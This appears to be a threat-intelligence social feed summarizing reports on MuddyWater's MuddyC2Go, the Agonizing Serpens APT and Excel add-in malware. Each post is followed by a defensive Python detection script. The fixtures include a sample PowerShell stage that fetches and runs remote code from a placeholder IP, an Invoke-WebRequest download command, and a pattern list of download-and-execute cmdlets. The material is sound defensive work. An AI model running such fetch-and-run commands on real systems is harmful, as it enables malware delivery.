#CyberAttackTrends
osintelligence · 7 months
https://bit.ly/3SDOVXl - 🕵️ Deep Instinct's Threat Research team has uncovered a new Command and Control (C2) framework, dubbed MuddyC2Go, believed to be used by the Iranian APT group MuddyWater. This C2 framework, written in Go, has possibly been active since 2020, replacing the group's earlier framework, PhonyC2. The discovery of MuddyC2Go highlights the evolving tactics of cyber threat actors. #MuddyC2Go #CyberSecurity #APT #IranianCyberThreats

🔍 The shift from PhonyC2 to MuddyC2Go was identified through anomalies in IP addresses previously associated with MuddyWater, revealing new behaviors and tactics. Deep Instinct's findings suggest a strategic evolution in MuddyWater's operations, highlighting the need for continuous monitoring and analysis of cyber threat actors' methodologies. #CyberThreatIntelligence #DeepInstinct #CyberAttackTrends

💻 Recent MuddyWater activities using MuddyC2Go involve spear-phishing emails with password-protected archives containing executables. These executables run embedded PowerShell scripts that connect to MuddyC2Go servers, indicating a move towards more sophisticated and automated attack methods. #SpearPhishing #Malware #CyberDefense

🌍 Deep Instinct's research has linked attacks using MuddyC2Go to various geographic locations, including a Jordanian company, an Iraqi telecommunications provider, and potential targets in Israel during the recent conflict. This geographical spread underscores the global reach and potential impact of MuddyWater's cyber operations. #GlobalCyberThreats #InfoSec #GeopoliticalCyberRisks

📡 In their investigation, Deep Instinct traced the MuddyC2Go framework back to 2020 and identified multiple IP addresses linked to MuddyWater's operations. These findings are supported by reports from other security firms, further validating the ongoing and evolving threat posed by this APT group. #CyberThreatResearch #IPAnalysis #CyberSecurityAwareness

🔗 The MuddyC2Go framework is challenging to fingerprint due to its generic appearance, similar to other web applications written in Go. However, unique URL patterns generated by the framework have helped Deep Instinct identify past attacks. This demonstrates the importance of detailed analysis in cybersecurity threat identification. #CyberForensics #ThreatHunting #CyberAnalysis

🛡️ Deep Instinct recommends disabling PowerShell if it's not needed or closely monitoring its activity if enabled, as PowerShell is a key component of MuddyWater's operations. The team's ongoing research and monitoring of MuddyC2Go servers provide vital insights for the cybersecurity community in combating such threats.
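The post's closing recommendation is to monitor PowerShell, and the lure chain it describes (archive → dropped executable → embedded PowerShell → C2) is exactly what process-creation telemetry captures. The following is an added triage example, not Deep Instinct's code and not a MuddyC2Go signature (the post does not publish its URL patterns): it scans constructed Sysmon-style process-creation events, decodes any `-EncodedCommand` payload, and alerts when a PowerShell launch combines a parent in a user staging directory, an encoded command, or download/execute cmdlets. The staging directories, indicator list, paths and IPs are assumptions chosen for the example.

```python
"""Added triage example for the MuddyC2Go lure chain: an executable unpacked from a
password-protected archive spawning PowerShell that reaches out to a C2 server.
Not Deep Instinct's code; events, paths and URLs are constructed samples in a
Sysmon Event ID 1-like shape (Image, ParentImage, CommandLine)."""
import base64
import re

# Where a user-extracted archive payload typically runs from (assumption).
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\users\\public\\")

# Download/execute cmdlets and evasion switches worth flagging (assumption: generic
# PowerShell tradecraft, not framework-specific indicators).
SUSPICIOUS = re.compile(
    r"(?:net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|invoke-restmethod|\birm\b|-w(?:indowstyle)?\s+hidden|"
    r"\bbypass\b)",
    re.IGNORECASE,
)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def from_staging_dir(path: str) -> bool:
    p = path.lower()
    return any(d in p for d in STAGING_DIRS)


def triage(events, min_reasons=2):
    """Return alerts for PowerShell launches that combine at least `min_reasons` indicators."""
    alerts = []
    for ev in events:
        if not ev["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        reasons = []
        if from_staging_dir(ev["ParentImage"]):
            reasons.append("parent from staging dir")
        payload = decode_encoded_command(ev["CommandLine"])
        if payload:
            reasons.append("encoded command")
        # Match against the visible command line plus the decoded payload, so that
        # base64 encoding does not hide the cmdlets.
        text = ev["CommandLine"] + " " + payload
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(text)})
        if hits:
            reasons.append("suspicious content")
        if len(reasons) >= min_reasons:
            alerts.append({"ProcessId": ev["ProcessId"], "reasons": reasons, "hits": hits})
    return alerts


# Constructed sample telemetry (not real events). Event 2 carries the kind of embedded
# PowerShell the post describes, encoded the way -EncodedCommand expects.
SAMPLE_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/p')"
SAMPLE_ENC = base64.b64encode(SAMPLE_STAGE2.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ProcessId": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ProcessId": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\Rar$EXa0.123\Invoice.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + SAMPLE_ENC},
    {"ProcessId": 3, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Users\bob\Downloads\scan_2023.exe",
     "CommandLine": "pwsh.exe -ExecutionPolicy Bypass -c \"Invoke-WebRequest http://203.0.113.5/a -OutFile $env:TEMP\\a.ps1\""},
    {"ProcessId": 4, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Users\bob\Downloads\scan_2023.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Requiring two independent indicators keeps a legitimate admin script launched from Explorer (event 1) quiet while catching both the encoded variant (event 2) and the plaintext variant launched from a Downloads folder (event 3). In production the same logic runs over Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.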
osintelligence · 7 months
https://bit.ly/3MC9n77 - 🔒 Cybersecurity researchers have identified a series of cyberattacks by the Iranian-backed Advanced Persistent Threat (APT) group “Agonizing Serpens,” targeting the Israeli education and tech sectors. The group aims to steal sensitive data for various purposes, including financial gain, identity theft, espionage, and causing disruption. These attacks involve rendering endpoints unusable and sometimes publishing stolen information on social media platforms. #Cybersecurity #APTGroups #DataTheft

🕵️‍♂️ Agonizing Serpens, active since 2020, employs sophisticated methods such as wipers and fake ransomware. Known by other names like Agrius, BlackShadow, and Pink Sandstorm, the group initially gains access through web server exploitation and deploys web shells for reconnaissance and network mapping. Tools like Nbtscan, WinEggDrop, and NimScan are commonly used for this purpose. #DigitalEspionage #HackerTactics #NetworkSecurity

🔐 The group's attack strategies include trying to gain admin credentials using methods like Mimikatz, SMB password spraying, and dumping the SAM file. They also use tools like Plink, WinSCP, and a custom sqlextractor for lateral movement and data exfiltration, targeting personal information like ID numbers and passport scans. Despite their efforts, many of their methods were blocked by Cortex XDR, showcasing the evolving battle between cybersecurity defenses and hacker tactics. #CyberDefense #DataExfiltration #InfoSec

🖥️ Agonizing Serpens has shown increased sophistication by employing new techniques to bypass Endpoint Detection and Response (EDR) systems. They developed custom tools like agmt.exe, a loader for the GMER driver, to terminate specific target processes. After failing to exploit the GMER driver, they turned to drvIX, leveraging a vulnerable driver from a public Proof of Concept (PoC) tool. #MalwareDevelopment #EDRBypass #CyberAttackTrends

💥 Unit 42 researchers discovered new wipers and tools used by Agonizing Serpens, including MultiLayer wiper, PartialWasher wiper, and BFG Agonizer wiper, as well as Sqlextractor, a custom tool for extracting information from database servers. These discoveries indicate the group's continual development of new tools to enhance their data theft and disruption capabilities.
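Of the credential-access techniques the post lists, SMB password spraying is the one that leaves a clean, logon-log-only footprint. The following is an added detection example, not Unit 42's code: it runs over constructed Windows Security events (Event ID 4625 failures with logon type 3, which is how SMB authentication failures are recorded) and flags a source that fails against many distinct accounts in a short window. The window and threshold are assumptions to tune per environment; the hosts, account names and timestamps are invented.

```python
"""Added detection example for SMB password spraying over constructed Windows
Security log events (4625 = failed logon, LogonType 3 = network, which SMB uses).
Not Unit 42's code; all IPs, users and timestamps are invented samples."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

SPRAY_WINDOW = timedelta(minutes=10)   # assumption: tune to your environment
SPRAY_MIN_ACCOUNTS = 8                 # distinct accounts from one source inside the window


def detect_password_spray(events, window=SPRAY_WINDOW, min_accounts=SPRAY_MIN_ACCOUNTS):
    """Return {source_ip: peak distinct accounts} for sources that look like a spray.

    A spray rotates accounts and keeps the password fixed, so per-account lockout
    thresholds never trip; the signal is many distinct TargetUserNames from one
    IpAddress inside a short window, not many failures against one account."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4625 or ev.get("LogonType") != 3:
            continue
        by_ip[ev["IpAddress"]].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["TargetUserName"].lower()))

    alerts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        in_window = deque()
        count = defaultdict(int)   # distinct accounts currently inside the window
        peak = 0
        for ts, user in attempts:
            in_window.append((ts, user))
            count[user] += 1
            # Slide the window: drop attempts older than `window` relative to this one.
            while ts - in_window[0][0] > window:
                _, old_user = in_window.popleft()
                count[old_user] -= 1
                if count[old_user] == 0:
                    del count[old_user]
            peak = max(peak, len(count))
        if peak >= min_accounts:
            alerts[ip] = peak
    return alerts


def make_event(ts, user, ip, event_id=4625, logon_type=3):
    return {"EventID": event_id, "TimeCreated": ts.isoformat(), "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type}


T0 = datetime(2023, 11, 1, 2, 0, 0)
# Constructed spray: one internal host walks 12 accounts with one password, 15 s apart.
SPRAY_USERS = ["administrator", "alice", "bob", "carol", "dave", "erin",
               "frank", "grace", "heidi", "ivan", "judy", "mallory"]
SAMPLE_EVENTS = [make_event(T0 + timedelta(seconds=15 * i), u, "10.10.5.23")
                 for i, u in enumerate(SPRAY_USERS)]
# Brute force of a single service account: noisy, but a different detection.
SAMPLE_EVENTS += [make_event(T0 + timedelta(seconds=5 * i), "svc_backup", "10.10.7.9")
                  for i in range(20)]
# A user mistyping a password interactively (logon type 2), then succeeding (4624).
SAMPLE_EVENTS += [make_event(T0, "alice", "10.10.1.4", logon_type=2),
                  make_event(T0 + timedelta(seconds=30), "alice", "10.10.1.4",
                             event_id=4624, logon_type=2)]

if __name__ == "__main__":
    print(detect_password_spray(SAMPLE_EVENTS))
```

The brute-force source never alerts here because it touches a single account; that case belongs to a lockout or failure-count rule. Against a slow spray (one attempt per account every few minutes) widen the window and lower the threshold, and key on the `Status`/`SubStatus` fields of 4625 to separate "bad password" from "no such user", which a spray of harvested names also produces.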
osintelligence · 7 months
https://bit.ly/47f9rS9 - 🔒 Cybercriminals are exploiting macro-enabled Excel add-in (XLL) files, with .xlam files now ranking as the 7th most commonly abused extension in Q3 2023. A significant rise from the 42nd position in Q2, this trend signals an increased focus on XLL attacks, despite a previous decline in early 2023. #Cybersecurity #XLLThreat

🚀 XLL files, offering enhanced capabilities over alternatives like VBA macros, are being used more effectively by attackers due to features like multithreading support. Notably, malware developers such as Dridex and Formbook have previously adopted XLL files. The increased functionality of XLLs makes them a potent tool for cyberattacks. #MalwareDevelopment #TechSecurity

📊 After Microsoft’s default block on VBA macros, attackers shifted focus, experimenting with different file types for malware attacks. Microsoft Office documents, often perceived as safe, are increasingly being used as mediums for malware distribution. #MicrosoftSecurity #OfficeSafety

📁 After the VBA macro block, .LNK files, experimentation with OneNote files, and ISO and RAR attachments surfaced as alternatives. The resurgence of XLL file use, despite Microsoft’s default block on XLL attachments from untrusted locations, is particularly noteworthy. #FileSecurity #CyberAttackTrends

🛡️ Attackers have successfully bypassed XLL blocks, as demonstrated in a remote access trojan (RAT) campaign using XLL attachments disguised as scanned invoices. The multithreading capability of add-ins was exploited to deploy payloads and increase the perceived legitimacy of the file. #RATAttack #CyberDefense

💼 The Parallax RAT, available for purchase, offers attackers remote control access, data exfiltration, and credential theft. Similar tactics were used in a campaign targeting LATAM hotels, installing XWorm RAT via PowerPoint add-in files. XWorm’s capabilities extend to keylogging and clipboard hijacking. #DataTheft #CybercrimeTactics

🌎 Separate XWorm attacks, targeting various industries in the US, Republic of Korea, and Germany, utilized malicious URLs embedded in .pdf, .docx, and .rtf formats. These evolving techniques highlight the need for continuous vigilance and adaptive security measures.
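The post mentions two distinct add-in formats that get lumped together as "XLL": a native XLL is a Windows DLL that Excel loads and calls through `xlAutoOpen`, while a .xlam is an OOXML (ZIP) package carrying a `vbaProject.bin`. An attachment "disguised as a scanned invoice" can wear any extension, so mail-gateway triage should classify by content. The following is an added example, not the report's code: it classifies a blob as XLL, .xlam, .xlsm or plain .xlsx from its bytes and flags extension/content mismatches. The sample files are constructed stubs (the PE-shaped one is not a loadable DLL), and the substring search for export names is a triage heuristic standing in for a full export-table parse, which is an assumption of this example.

```python
"""Added triage example for Excel add-in abuse: classify a suspected add-in by its
bytes rather than by the extension the sender chose. Not the vendor's code; the
sample files below are minimal constructed stubs."""
import io
import zipfile

# OOXML main-part content types (Office's own identifiers).
XLSX_MAIN = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"
XLSM_MAIN = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
XLAM_MAIN = "application/vnd.ms-excel.addin.macroEnabled.main+xml"
# Entry points Excel looks for in a native XLL (Excel SDK export names).
XLL_EXPORTS = (b"xlAutoOpen", b"xlAutoAdd", b"xlAutoRegister12", b"xlAddInManagerInfo12")


def classify(data: bytes) -> dict:
    """Return {'kind': ..., 'evidence': [...]} for the blob."""
    evidence = []
    if data[:2] == b"MZ":
        # XLLs are ordinary DLLs; Excel calls xlAutoOpen on load, so the export name
        # must be present. Substring search is a triage heuristic (assumption), not a
        # full export-table parse, and says nothing about what the code does.
        evidence = [n.decode() for n in XLL_EXPORTS if n in data]
        return {"kind": "xll" if evidence else "pe", "evidence": evidence}
    if data[:4] == b"PK\x03\x04":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = set(zf.namelist())
                ctypes = (zf.read("[Content_Types].xml").decode("utf-8", "replace")
                          if "[Content_Types].xml" in names else "")
        except zipfile.BadZipFile:
            return {"kind": "corrupt-zip", "evidence": []}
        if "xl/vbaProject.bin" in names:
            evidence.append("xl/vbaProject.bin")
        if XLAM_MAIN in ctypes:
            return {"kind": "xlam", "evidence": evidence + [XLAM_MAIN]}
        if XLSM_MAIN in ctypes:
            return {"kind": "xlsm", "evidence": evidence + [XLSM_MAIN]}
        if "xl/workbook.xml" in names:
            # A workbook that hides VBA behind a non-macro content type is itself a signal.
            return {"kind": "xlsx" if not evidence else "ooxml-with-vba", "evidence": evidence}
        return {"kind": "zip", "evidence": evidence}
    return {"kind": "unknown", "evidence": evidence}


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension promises something other than what the content is."""
    expected = {"xlsx": "xlsx", "xlsm": "xlsm", "xlam": "xlam", "xll": "xll"}
    ext = filename.lower().rsplit(".", 1)[-1]
    return ext in expected and expected[ext] != classify(data)["kind"]


def build_ooxml(main_content_type: str, with_vba: bool) -> bytes:
    """Constructed minimal OOXML container: just enough structure for triage."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/xl/workbook.xml" ContentType="%s"/></Types>'
                    % main_content_type)
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)  # OLE magic stub
    return buf.getvalue()


SAMPLE_XLSX = build_ooxml(XLSX_MAIN, with_vba=False)
SAMPLE_XLAM = build_ooxml(XLAM_MAIN, with_vba=True)
# Constructed PE-shaped stubs (not loadable DLLs): MZ header, e_lfanew, PE signature, a name.
_PE_HEAD = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 32
SAMPLE_XLL = _PE_HEAD + b"xlAutoOpen\x00"
SAMPLE_PLAIN_DLL = _PE_HEAD + b"DllMain\x00"

if __name__ == "__main__":
    for name, blob in [("Scanned_Invoice.xlsx", SAMPLE_XLAM), ("Scanned_Invoice.xll", SAMPLE_XLL),
                       ("report.xlsx", SAMPLE_XLSX), ("helper.dll", SAMPLE_PLAIN_DLL)]:
        print(name, classify(blob), "MISMATCH" if extension_mismatch(name, blob) else "")
```

Used at a gateway, the "xll" and "xlam" verdicts are what the untrusted-location block is meant to stop; a mismatch such as a .xlsx name over macro-enabled content is worth quarantining on its own, since no legitimate workflow produces it.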